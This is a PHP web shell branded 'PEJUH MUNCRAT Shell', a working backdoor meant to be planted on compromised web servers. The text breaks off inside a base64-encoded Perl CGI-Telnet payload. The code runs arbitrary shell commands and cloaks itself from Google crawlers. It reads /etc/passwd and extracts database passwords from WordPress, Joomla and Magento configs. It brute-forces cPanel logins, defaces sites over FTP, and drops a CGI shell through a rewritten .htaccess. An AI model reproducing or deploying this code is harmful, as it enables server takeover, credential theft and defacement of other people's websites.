bobijmbt

1. <?php
2. ob_start();
3. ini_set('display_errors', false);
4. ini_set('memory_limit', '-1');
5.  
6. if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) { header('HTTP/1.0 404 Not Found'); exit; }
7.  
8. @ini_set('error_log',NULL);
9. @ini_set('log_errors',0);
10. @ini_set('max_execution_time',0);
11.  
12. if(isset($_GET['img'])){
13. @ob_clean();
14. $d = magicboom($_GET['dir']."/");
15. $f = $_GET['img'];
16. $inf = @getimagesize($d.$f);
17. $ext = explode($f,".");
18. $ext = $ext[count($ext)-1];
19. @header("Content-type: ".$inf["mime"]);
20. @header("Cache-control: public");
21. @header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
22. @header("Cache-control: max-age=".(60*60*24*7));
23. @readfile($d.$f);
24. exit;
25. }
26. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
27. @ob_clean();
28. $file = $_GET['file'];
29. header('Content-Description: File Transfer');
30. header('Content-Type: application/octet-stream');
31. header('Content-Disposition: attachment; filename="'.basename($file).'"');
32. header('Expires: 0');
33. header('Cache-Control: must-revalidate');
34. header('Pragma: public');
35. header('Content-Length: ' . filesize($file));
36. readfile($file);
37. exit;
38. }
39.  
40. ?>
41. <!DOCTYPE html>
42. <html>
43. <style stype="text/css">
44. @import url(https://fonts.googleapis.com/css?family=Abel|Baumans);
45. .flink{font-weight:normal;}
46. body{background-color:#101010; background:#101010;color:#f2f2f2;font-family:Abel;font-size:12px;}
47. body a{ color:#3467BA;text-decoration:none;}
48. body a:hover{text-decoration:underline;}
49. #main_content{border:1px solid #5C7296;overflow:hidden;width:1000px;height:auto;padding:15px;margin: 0 auto;background:#0A0A0A;border-radius:6px;-moz-border-radius:6px;-webkit-border-radius:6px;}
50. .enabled{color:#7ACC29;}
51. .enabled a{color:#7ACC29;font-weight:normal;}
52. .disabled{color:#CC0000;}
53. .execbox{width:250px;padding: 5px 15px 15px 15px;height:auto;border:solid 1px #47A3FF;background:#0A0A0A;}
54. .viewsource{border:solid 1px #47A3FF;background:#0A0A0A;color:#f2f2f2;}
55. .command{width:620px;border:solid 1px #47A3FF;outline:none;background:#0A0A0A;color:#f2f2f2;}
56. .response{width:616px;color:green;height:300px;border-bottom:solid 1px #47A3FF;border-right:solid 1px #47A3FF;border-left:solid 1px #47A3FF;border-top:0;outline:none;background:#0A0A0A;color:#f2f2f2;margin:-4px 0px 0px 0px;}
57. .TableHeader_Name{width:400px;padding:0px 0px 0px 5px;height:25px;font-family:Abel;background-color:#282828;border-top-left-radius:4px;-moz-border-top-left-radius:4px;-webkit-border-top-left-radius:4px;}
58. .TableHeader{width:100px;height:25px;font-family:Abel;text-align:center;background-color:#282828;}
59. .TableHeaderoptions{padding:0px 0px 0px 15px;width:200px;height:25px;font-family:Abel;background-color:#282828;border-top-right-radius:4px;-moz-border-top-right-radius:4px;-webkit-border-top-right-radius:4px;}
60.  
61. .TableLast{padding:0px 0px 0px 15px;width:200px;height:25px;font-family:Abel;background-color:#282828;border-top-right-radius:4px;-moz-border-top-right-radius:4px;-webkit-border-top-right-radius:4px;}
62.  
63.  
64. .filesize{color:green;text-align:center;}
65. .filenames a{font-weight:normal;text-decoration:none;}
66. .filenames a:hover{text-decoration:underline;}
67. tr{background-color: #080808;}
68. tr:hover{background-color:#282828;}
69. #options{font-weight:200;font-family:Abel;margin-left:10px;display:block;}
70. #title{font-size:25px;font-family:arial;display:block;padding:15px 0px 0px 0px;}
71. .Logo{font-size:150px;text-align:center;color:#101010;}
72. .logotext{font-size:20px;text-align:center;color:#101010;}
73. .terminaltop{background-color:#686868;margin:-10px 0px -3px 0px;width:622px;height:20px;border-top-right-radius:5px;-moz-border-top-right-radius:5px;-webkit-border-top-right-radius:5px;border-top-left-radius:5px;-moz-border-top-left-radius:5px;-webkit-border-top-left-radius:5px;}
74. .TableHeaderoptions2{padding:0px 0px 0px 15px;width:170px;height:25px;font-family:Abel;background-color:#282828;border-top-right-radius:4px;-moz-border-top-right-radius:4px;-webkit-border-top-right-radius:4px;}
75. .box{padding:10px;background-color:#292929;border:1px solid #3467BA;height:auto;width:970;border-radius:6px;-moz-border-radius:6px;-webkit-border-radius:6px;}
76. .box2{padding:5px;background-color:#000000;height:auto;width:970;border-radius:6px;-moz-border-radius:6px;-webkit-border-radius:6px;}
77. .optionstr td{background-color:#0A0A0A;}
78. .optionstr td:hover{background-color:#0A0A0A;}
79. .chdir{background-color:#010101;color:#f2f2f2;border:1px solid #3467BA;outline:none;font-size:11px;border-radius:3px;-moz-border-radius:3px;-webkit-border-radius:3px;padding:2px 3px;margin:0 0 0 -1px;}
80. .godir{margin:0px 10px 0px -5px;background-color:#292929;color:#f2f2f2;border:1px solid #3467BA;outline:none;font-size:11px;width:24px;border-top-right-radius:4px;-moz-border-top-right-radius:4px;-webkit-border-top-right-radius:4px;border-bottom-right-radius:4px;-moz-border-bottom-right-radius:4px;-webkit-border-bottom-right-radius:4px;}
81. .sembunyi{
82. display:none;
83. padding:0;margin:0;
84. }
85. textarea {
86. background-color:#010101;
87. color:#f2f2f2;
88. border:1px solid #3467BA;
89. outline:none;font-size:11px;
90. border-radius:3px;
91. -moz-border-radius:3px;
92. -webkit-border-radius:3px;
93. padding:5px;
94. width:970px;
95. height:400px;
96.  
97.  
98. }
99. select{
100.  
101. background:#010101;
102. color:#f2f2f2;
103. margin:0 4px;
104. border:1px solid #3467BA;
105. outline:none;font-size:11px;
106. border-radius:3px;
107. -moz-border-radius:3px;
108. -webkit-border-radius:3px;
109.  
110. }
111.  
112. input[type=text], input[type=password],input[type=submit]{
113. background:#010101;
114. color:#f2f2f2;
115. margin:0 4px;
116. border:1px solid #3467BA;
117. outline:none;font-size:11px;
118. border-radius:3px;
119. -moz-border-radius:3px;
120. -webkit-border-radius:3px;
121.  
122. }
123. .viewfile{
124. background:#EDECEB;
125. color:#000000;
126. margin:4px 2px;
127. padding:8px;
128. border-radius:3px;
129. -moz-border-radius:3px;
130. -webkit-border-radius:3px;
131. border:1px solid #3467BA;
132. }
133.  
134. </style>
135.  
136. <?php
137. if(isset($_GET['dir'])) {
138. $dir = $_GET['dir'];
139. chdir($_GET['dir']);
140. } else {
141. $dir = getcwd();
142. }
143. $dir = str_replace("\\","/",$dir);
144. $scdir = explode("/", $dir);
145. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=lime>NONE</font>";
146. echo "<title>PEJUHMUNCRAT EDITAN SHELL</title>";
147. function UrlLoop($url,$type){
148.  
149. $urlArray = array();
150.  
151. $ch = curl_init();
152. curl_setopt($ch, CURLOPT_URL, $url);
153. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
154. $result = curl_exec($ch);
155.  
156. $regex='|<a.*?href="(.*?)"|';
157. preg_match_all($regex,$result,$parts);
158. $links=$parts[1];
159. foreach($links as $link){
160. array_push($urlArray, $link);
161. }
162. curl_close($ch);
163.  
164. foreach($urlArray as $value){
165. $lol="$url$value";
166. if(preg_match("#$type#is", $lol)) {
167. echo "$lol\r\n";
168. }
169. }
170. }
171. function magicboom($text){
172. if (!get_magic_quotes_gpc()) {
173. return $text;
174. }
175. return stripslashes($text);
176. }
177. function ambilKata($param, $kata1, $kata2){
178. if(strpos($param, $kata1) === FALSE) return FALSE;
179. if(strpos($param, $kata2) === FALSE) return FALSE;
180. $start = strpos($param, $kata1) + strlen($kata1);
181. $end = strpos($param, $kata2, $start);
182. $return = substr($param, $start, $end - $start);
183. return $return;
184. }
185. function w($dir,$perm) {
186. if(!is_writable($dir)) {
187. return "<center><font color=red>".$perm."</font>";
188. } else {
189. return "<center><font color=lime>".$perm."</font>";
190. }
191. }
192. function exe($cmd) {
193. if(function_exists('system')) {
194. @ob_start();
195. @system($cmd);
196. $buff = @ob_get_contents();
197. @ob_end_clean();
198. return $buff;
199. } elseif(function_exists('exec')) {
200. @exec($cmd,$results);
201. $buff = "";
202. foreach($results as $result) {
203. $buff .= $result;
204. } return $buff;
205. } elseif(function_exists('passthru')) {
206. @ob_start();
207. @passthru($cmd);
208. $buff = @ob_get_contents();
209. @ob_end_clean();
210. return $buff;
211. } elseif(function_exists('shell_exec')) {
212. $buff = @shell_exec($cmd);
213. return $buff;
214. }
215. }
216. $shellVersion = "1.1";
217. /////////////////////////////////////
218.  
219. if(!function_exists('posix_getegid')) {
220. $user = @get_current_user();
221. $uid = @getmyuid();
222. $gid = @getmygid();
223. $group = "?";
224. } else {
225. $uid = @posix_getpwuid(posix_geteuid());
226. $gid = @posix_getgrgid(posix_getegid());
227. $user = $uid['name'];
228. $uid = $uid['uid'];
229. $group = $gid['name'];
230. $gid = $gid['gid'];
231. }
232. $sport=$_SERVER['SERVER_PORT'];
233. $d0mains = @file("/etc/named.conf");
234. $users=@file('/etc/passwd');
235. if($d0mains)
236. {
237. $count;
238. foreach($d0mains as $d0main)
239. {
240. if(@ereg("zone",$d0main))
241. {
242. preg_match_all('#zone "(.*)"#', $d0main, $domains);
243. flush();
244. if(strlen(trim($domains[1][0])) > 2)
245. {
246. flush();
247. $count++;
248. }
249. }
250. }
251. }
252. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=lime>OFF</font>";
253. echo "<body>
254. <div id='main_content'><span id='title'><font face='Baumans'>PEJUH MUNCRAT Shell </font> </span><i>The Next JanCox Shell</i><br><br><div class='box'>
255. Server Name: ".php_uname()."<br />User : <font color=lime>".$user."</font> (".$uid.") Group : <font color=lime>".$group."</font> (".$gid.")<br>
256. Server IP: <font color=lime>".gethostbyname($_SERVER['HTTP_HOST'])."</font> | Port : <font color=lime>$sport</font> | Your IP: <font color=lime>".$_SERVER['REMOTE_ADDR']."</font><br>
257. Websites :<font color=lime> $count </font> Domains<br>
258. Safe Mode: $sm<br>
259. Disable Functions: $show_ds<br>
260. Server Software: ".$_SERVER["SERVER_SOFTWARE"]." <span class='enabled'><a href='http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=".$_SERVER['SERVER_SOFTWARE']."&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=' target='_blank'>[Exploit DB]</a></span>
261. <br>Directory : ";
262. foreach($scdir as $c_dir => $cdir) {
263. echo "<a href='?dir=";
264. for($i = 0; $i <= $c_dir; $i++) {
265. echo $scdir[$i];
266. if($i != $c_dir) {
267. echo "/";
268. }
269. }
270. echo "'>$cdir</a>/";
271. }
272. echo"<br><form method='post' action='?dir=$dir&do=cmd'>
273. Command :
274. <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
275. </form></div><p></p>";
276.  
277. echo '<a href="?">Home</a> / ';
278. echo "<a href='?dir=".$dir."&do=upload'>Upload</a> / ";
279. echo "<a href='?dir=".$dir."&do=config'>Config</a> / ";
280. echo "<a href='?dir=".$dir."&do=jump'>Jump</a> / ";
281. echo "<a href='?dir=".$dir."&do=symlink'>Sym</a> / ";
282. echo "<a href='?dir=".$dir."&do=cpanel'>Cpanel</a> / ";
283. echo "<a href='?dir=".$dir."&do=symlink'>Sym</a> / ";
284. echo "<a href='?dir=".$dir."&do=mass_deface'>Mass</a> / ";
285. echo "<a href='?dir=".$dir."&do=mirror'>Mirror</a> / ";
286. echo "<a href='?dir=".$dir."&do=cgi'>Cgi</a> / ";
287. echo "<a href='?YmNrbmV0='>BC</a> / ";
288. echo "<a href='?about'>About</a> / ";
289. echo "<a href='?c3J2aW5mbw='>Server Info</a> / ";
290. echo "<a href='?do=deleteme'>Self Remove</a> / ";
291. echo "<a href='?dir=".$dir."&do=ndelikne'>Hidden Shell</a> / ";
292. echo "<a href='?dir=".$dir."&do=auto_cu_wp'>Auto CU Wp</a> / ";
293. echo "<a href='?dir=".$dir."&do=auto_cu_joomla'>Auto CU Joomla</a> / ";
294. echo "<a href='?dir=".$dir."&do=hek'>Deface</a> / ";
295.  
296. echo '<hr>';
297. /////////////////////////////////////
298.  
299. if($_GET['act'] == 'delete') {
300. $delete = unlink($_GET['file']);
301. if($delete) {
302. $act = "<script>window.location='?dir=".$dir."';</script>";
303. } else {
304. $act = "<font color=red>permission denied</font>";
305. }
306. echo $act;
307. }
308.  
309. elseif($_GET['act'] == 'delete_dir') {
310. function Delete($path)
311. {
312. $path = (substr($path,-1)=='/') ? $path:$path.'/';
313. $dh = opendir($path);
314. while ( ($item = readdir($dh) ) !== false) {
315. $item = $path.$item;
316. if ( (basename($item) == "..") || (basename($item) == ".") )
317. continue;
318. $type = filetype($item);
319. if ($type == "dir")
320. Delete($item);
321. else
322. @unlink($item);
323. }
324. closedir($dh);
325. @rmdir($path);}
326. $delete_dir = Delete($dir);
327. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
328. echo $act;
329. }
330. elseif($_GET['act'] == 'rename') {
331. if($_POST['do_rename']) {
332. $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
333. if($rename) {
334. $act = "<script>window.location='?dir=".$dir."';</script>";
335. } else {
336. $act = "<font color=red>permission denied</font>";
337. }
338. echo "".$act."<br>";
339. }
340. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
341. echo "<form method='post'>
342. <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
343. <input type='submit' name='do_rename' value='rename'>
344. </form>";
345. }elseif($_GET['act'] == 'newfolder') {
346. if($_POST['new_save_folder']) {
347. $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
348. if(!mkdir($new_folder)) {
349. $act = "<font color=red>permission denied</font>";
350. } else {
351. $act = "<script>window.location='?dir=".$dir."';</script>";
352. }
353. }
354. echo $act;
355. echo "<form method='post'>
356. Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
357. <input type='submit' name='new_save_folder' value='Submit'>
358. </form>";
359. }
360. elseif($_GET['act'] == 'view') {
361. if(is_file($_GET['file'])){
362. if(!isset($file)) $file = magicboom($_GET['file']);
363. echo "Filename : <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
364. if(isset($_GET['type']) && ($_GET['type']=='image')){
365. echo "<div style=\"text-align:center;margin:8px;\"><img src=\"?dir=".$dir."&amp;img=".$filn."\"></div>";
366. }
367. else {
368. echo "<div class=\"viewfile\">";
369. $file = wordwrap(@file_get_contents($file),"240","\n");
370. @highlight_string($file);
371. echo "</div>";
372. }
373. }
374. elseif(is_dir($_GET['view'])){
375. echo showdir($dir,$prompt);
376. }
377.  
378. }
379. elseif($_GET['do'] == 'upload') {
380. echo "<center>";
381. if($_POST['upload']) {
382. if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
383. $act = "<font color=lime>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
384. } else {
385. $act = "<font color=red>failed to upload file</font>";
386. }
387. }
388. echo "Upload File: <form method='post' enctype='multipart/form-data'><input type='file' name='ix_file'><input type='submit' value='upload' name='upload'></form>";
389. echo $act;
390. echo "</center>";
391. }elseif($_GET['do'] == 'cpanel') {
392. if($_POST['crack']) {
393. if($_POST['depes']) {
394. $usercp = explode("\r\n", $_POST['user_cp']);
395. $passcp = explode("\r\n", $_POST['pass_cp']);
396. $i = 0;
397. foreach($usercp as $ucp) {
398. foreach($passcp as $pcp) {
399. if(@mysql_connect('localhost', $ucp, $pcp)) {
400. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
401. } else {
402. $_SESSION[$ucp] = "1";
403. $_SESSION[$pcp] = "1";
404. if($ucp == '' || $pcp == '') {
405. //
406. } else {
407. echo "[+] username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
408. $ftp_conn = ftp_connect(gethostbyname($_SERVER['HTTP_HOST']));
409. $ftp_login = ftp_login($ftp_conn, $ucp, $pcp);
410. if((!$ftp_login) || (!$ftp_conn)) {
411. echo "[+] <font color=red>Login Gagal</font><br><br>";
412. } else {
413. echo "[+] <font color=lime>Login Sukses</font><br>";
414. $fi = htmlspecialchars($_POST['file_deface']);
415. $deface = ftp_put($ftp_conn, "public_html/$fi", $_POST['deface'], FTP_BINARY);
416. if($deface) {
417. $i++;
418. echo "[+] <font color=lime>Deface Sukses</font><br>";
419. if(function_exists('posix_getpwuid')) {
420. $domain_cp = file_get_contents("/etc/named.conf");
421. if($domain_cp == '') {
422. echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
423. } else {
424. preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
425. foreach($domains_cp[1] as $dj) {
426. $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
427. $user_cp_url = $user_cp_url['name'];
428. if($user_cp_url == $ucp) {
429. echo "[+] <a href='http://$dj/$fi' target='_blank'>http://$dj/$fi</a><br><br>";
430. break;
431. }
432. }
433. }
434. } else {
435. echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
436. }
437. } else {
438. echo "[-] <font color=red>Deface Gagal</font><br><br>";
439. }
440. }
441. //echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
442. }
443. }
444. }
445. }
446. }
447. if($i == 0) {
448. } else {
449. echo "<br>Sukses Deface ".$i." Cpanel by <font color=lime>JanCox.</font>";
450. }}
451.  
452. $usercp = explode("\r\n", $_POST['user_cp']);
453. $passcp = explode("\r\n", $_POST['pass_cp']);
454. $i = 0;
455. foreach($usercp as $ucp) {
456. foreach($passcp as $pcp) {
457. if(@mysql_connect('localhost', $ucp, $pcp)) {
458. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
459. } else {
460. $_SESSION[$ucp] = "1";
461. $_SESSION[$pcp] = "1";
462. $i++;
463. echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
464. }
465. }
466. }
467. }
468. if($i == 0) {
469. } else {
470. echo "<br>Nemu ".$i." Cpanel by <font color=lime>7atim</font>";
471. }
472. } else {
473. echo "<center>
474. <form method='post'>
475. USER: <br>
476. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
477. $_usercp = fopen("/etc/passwd","r");
478. while($getu = fgets($_usercp)) {
479. if($getu == '' || !$_usercp) {
480. echo "<font color=red>Can't read /etc/passwd</font>";
481. } else {
482. preg_match_all("/(.*?):x:/", $getu, $u);
483. foreach($u[1] as $user_cp) {
484. if(is_dir("/home/$user_cp/public_html")) {
485. echo "$user_cp\n";
486. }
487. }
488. }
489. }
490. echo "</textarea><br>
491. PASS: <br>
492. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
493. function cp_pass($dir) {
494. $pass = "";
495. $dira = scandir($dir);
496. foreach($dira as $dirb) {
497. if(!is_file("$dir/$dirb")) continue;
498. $ambil = file_get_contents("$dir/$dirb");
499. if(preg_match("/WordPress/", $ambil)) {
500. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
501. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
502. $pass .= ambilkata($ambil,"password = '","'")."\n";
503. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
504. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
505. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
506. $pass .= ambilkata($ambil,'password = "','"')."\n";
507. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
508. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
509. } elseif(preg_match("/client/", $ambil)) {
510. preg_match("/password=(.*)/", $ambil, $pass1);
511. if(preg_match('/"/', $pass1[1])) {
512. $pass1[1] = str_replace('"', "", $pass1[1]);
513. $pass .= $pass1[1]."\n";
514. }
515. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
516. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
517. }
518. }
519. echo $pass;
520. }
521. $cp_pass = cp_pass($dir);
522. echo $cp_pass;
523. echo "</textarea><br><input type='checkbox' name='depes'> Deface Sekalian |
524. <input type='submit' name='crack' style='width: 450px;' value='Crack'>
525. </form></center>";
526. }
527. }elseif($_GET['do'] == 'cgi') {
528. echo "<center/><br/><b><font color=blue>+--==[ cgitelnet.v1 Bypass Exploit]==--+ </font></b><br><br>";
529. mkdir('cgitelnet1', 0755);
530. chdir('cgitelnet1');
531. $kokdosya = ".htaccess";
532. $dosya_adi = "$kokdosya";
533. $dosya = fopen ($dosya_adi , 'w') or die ("Dosya a&#231;&#305;lamad&#305;!");
534. $metin = "Options FollowSymLinks MultiViews Indexes ExecCGI
535.  
536. AddType application/x-httpd-cgi .cin
537.  
538. AddHandler cgi-script .cin
539. AddHandler cgi-script .cin";
540. fwrite ( $dosya , $metin ) ;
541. fclose ($dosya);
542. $cgishellizocin = 'IyEvdXNyL2Jpbi9wZXJsCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBDb3B5cmlnaHQgYW5kIExpY2VuY2UKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIENHSS1UZWxuZXQgVmVyc2lvbiAxLjAgZm9yIE5UIGFuZCBVbml4IDogUnVuIENvbW1hbmRzIG9uIHlvdXIgV2ViIFNlcnZlcgojCiMgQ29weXJpZ2h0IChDKSAyMDAxIFJvaGl0YWIgQmF0cmEKIyBQZXJtaXNzaW9uIGlzIGdyYW50ZWQgdG8gdXNlLCBkaXN0cmlidXRlIGFuZCBtb2RpZnkgdGhpcyBzY3JpcHQgc28gbG9uZwojIGFzIHRoaXMgY29weXJpZ2h0IG5vdGljZSBpcyBsZWZ0IGludGFjdC4gSWYgeW91IG1ha2UgY2hhbmdlcyB0byB0aGUgc2NyaXB0CiMgcGxlYXNlIGRvY3VtZW50IHRoZW0gYW5kIGluZm9ybSBtZS4gSWYgeW91IHdvdWxkIGxpa2UgYW55IGNoYW5nZXMgdG8gYmUgbWFkZQojIGluIHRoaXMgc2NyaXB0LCB5b3UgY2FuIGUtbWFpbCBtZS4KIwojIEF1dGhvcjogUm9oaXRhYiBCYXRyYQojIEF1dGhvciBlLW1haWw6IHJvaGl0YWJAcm9oaXRhYi5jb20KIyBBdXRob3IgSG9tZXBhZ2U6IGh0dHA6Ly93d3cucm9oaXRhYi5jb20vCiMgU2NyaXB0IEhvbWVwYWdlOiBodHRwOi8vd3d3LnJvaGl0YWIuY29tL2NnaXNjcmlwdHMvY2dpdGVsbmV0Lmh0bWwKIyBQcm9kdWN0IFN1cHBvcnQ6IGh0dHA6Ly93d3cucm9oaXRhYi5jb20vc3VwcG9ydC8KIyBEaXNjdXNzaW9uIEZvcnVtOiBodHRwOi8vd3d3LnJvaGl0YWIuY29tL2Rpc2N1c3MvCiMgTWFpbGluZyBMaXN0OiBodHRwOi8vd3d3LnJvaGl0YWIuY29tL21saXN0LwojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgSW5zdGFsbGF0aW9uCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBUbyBpbnN0YWxsIHRoaXMgc2NyaXB0CiMKIyAxLiBNb2RpZnkgdGhlIGZpcnN0IGxpbmUgIiMhL3Vzci9iaW4vcGVybCIgdG8gcG9pbnQgdG8gdGhlIGNvcnJlY3QgcGF0aCBvbgojICAgIHlvdXIgc2VydmVyLiBGb3IgbW9zdCBzZXJ2ZXJzLCB5b3UgbWF5IG5vdCBuZWVkIHRvIG1vZGlmeSB0aGlzLgojIDIuIENoYW5nZSB0aGUgcGFzc3dvcmQgaW4gdGhlIENvbmZpZ3VyYXRpb24gc2VjdGlvbiBiZWxvdy4KIyAzLiBJZiB5b3UncmUgcnVubmluZyB0aGUgc2NyaXB0IHVuZGVyIFdpbmRvd3MgTlQsIHNldCAkV2luTlQgPSAxIGluIHRoZQojICAgIENvbmZpZ3VyYXRpb24gU2VjdGlvbiBiZWxvdy4KIyA0LiBVcGxvYWQgdGhlIHNjcmlwdCB0byBhIGRpcmVjdG9yeSBvbiB5b3VyIHNlcnZlciB3aGljaCBoYXMgcGVybWlzc2lvbnMgdG8KIyAgICBleGVjdXRlIENHSSBzY3JpcHRzLiBUaGlzIGlzIHVzdWFsbHkgY2dpLWJpbi4gTWFrZSBzdXJlIHRoYXQgeW91IHVwbG9hZAojICAgIHRoZSBzY3JpcHQgaW4gQVNDSUkgbW9kZS4KIyA1LiBDaGFuZ2UgdGhlIHBlcm1pc3Npb24gKENITU9EKSBvZiB0aGUgc2NyaXB0IHRvIDc1NS4KIyA2LiBPcGVuIHRoZSBzY3JpcHQgaW4geW91ciB3ZWIgYnJvd3Nlci4gSWYgeW91IHVwbG9hZGVkIHRoZSBzY3JpcHQgaW4KIyAgICBjZ2ktYmluLCB0aGlzIHNob3VsZCBiZSBodHRwOi8vd3d3LnlvdXJzZXJ2ZXIuY29tL2NnaS1iaW4vY2dpdGVsbmV0LnBsCiMgNy4gTG9naW4gdXNpbmcgdGhlIHBhc3N3b3JkIHRoYXQgeW91IHNwZWNpZmllZCBpbiBTdGVwIDIuCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBDb25maWd1cmF0aW9uOiBZb3UgbmVlZCB0byBjaGFuZ2Ugb25seSAkUGFzc3dvcmQgYW5kICRXaW5OVC4gVGhlIG90aGVyCiMgdmFsdWVzIHNob3VsZCB3b3JrIGZpbmUgZm9yIG1vc3Qgc3lzdGVtcy4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQokUGFzc3dvcmQgPSAiMTIzNDU2IjsJCSMgQ2hhbmdlIHRoaXMuIFlvdSB3aWxsIG5lZWQgdG8gZW50ZXIgdGhpcwoJCQkJIyB0byBsb2dpbi4KCiRXaW5OVCA9IDA7CQkJIyBZb3UgbmVlZCB0byBjaGFuZ2UgdGhlIHZhbHVlIG9mIHRoaXMgdG8gMSBpZgoJCQkJIyB5b3UncmUgcnVubmluZyB0aGlzIHNjcmlwdCBvbiBhIFdpbmRvd3MgTlQKCQkJCSMgbWFjaGluZS4gSWYgeW91J3JlIHJ1bm5pbmcgaXQgb24gVW5peCwgeW91CgkJCQkjIGNhbiBsZWF2ZSB0aGUgdmFsdWUgYXMgaXQgaXMuCgokTlRDbWRTZXAgPSAiJiI7CQkjIFRoaXMgY2hhcmFjdGVyIGlzIHVzZWQgdG8gc2VwZXJhdGUgMiBjb21tYW5kcwoJCQkJIyBpbiBhIGNvbW1hbmQgbGluZSBvbiBXaW5kb3dzIE5ULgoKJFVuaXhDbWRTZXAgPSAiOyI7CQkjIFRoaXMgY2hhcmFjdGVyIGlzIHVzZWQgdG8gc2VwZXJhdGUgMiBjb21tYW5kcwoJCQkJIyBpbiBhIGNvbW1hbmQgbGluZSBvbiBVbml4LgoKJENvbW1hbmRUaW1lb3V0RHVyYXRpb24gPSAxMDsJIyBUaW1lIGluIHNlY29uZHMgYWZ0ZXIgY29tbWFuZHMgd2lsbCBiZSBraWxsZWQKCQkJCSMgRG9uJ3Qgc2V0IHRoaXMgdG8gYSB2ZXJ5IGxhcmdlIHZhbHVlLiBUaGlzIGlzCgkJCQkjIHVzZWZ1bCBmb3IgY29tbWFuZHMgdGhhdCBtYXkgaGFuZyBvciB0aGF0CgkJCQkjIHRha2UgdmVyeSBsb25nIHRvIGV4ZWN1dGUsIGxpa2UgImZpbmQgLyIuCgkJCQkjIFRoaXMgaXMgdmFsaWQgb25seSBvbiBVbml4IHNlcnZlcnMuIEl0IGlzCgkJCQkjIGlnbm9yZWQgb24gTlQgU2VydmVycy4KCiRTaG93RHluYW1pY091dHB1dCA9IDE7CQkjIElmIHRoaXMgaXMgMSwgdGhlbiBkYXRhIGlzIHNlbnQgdG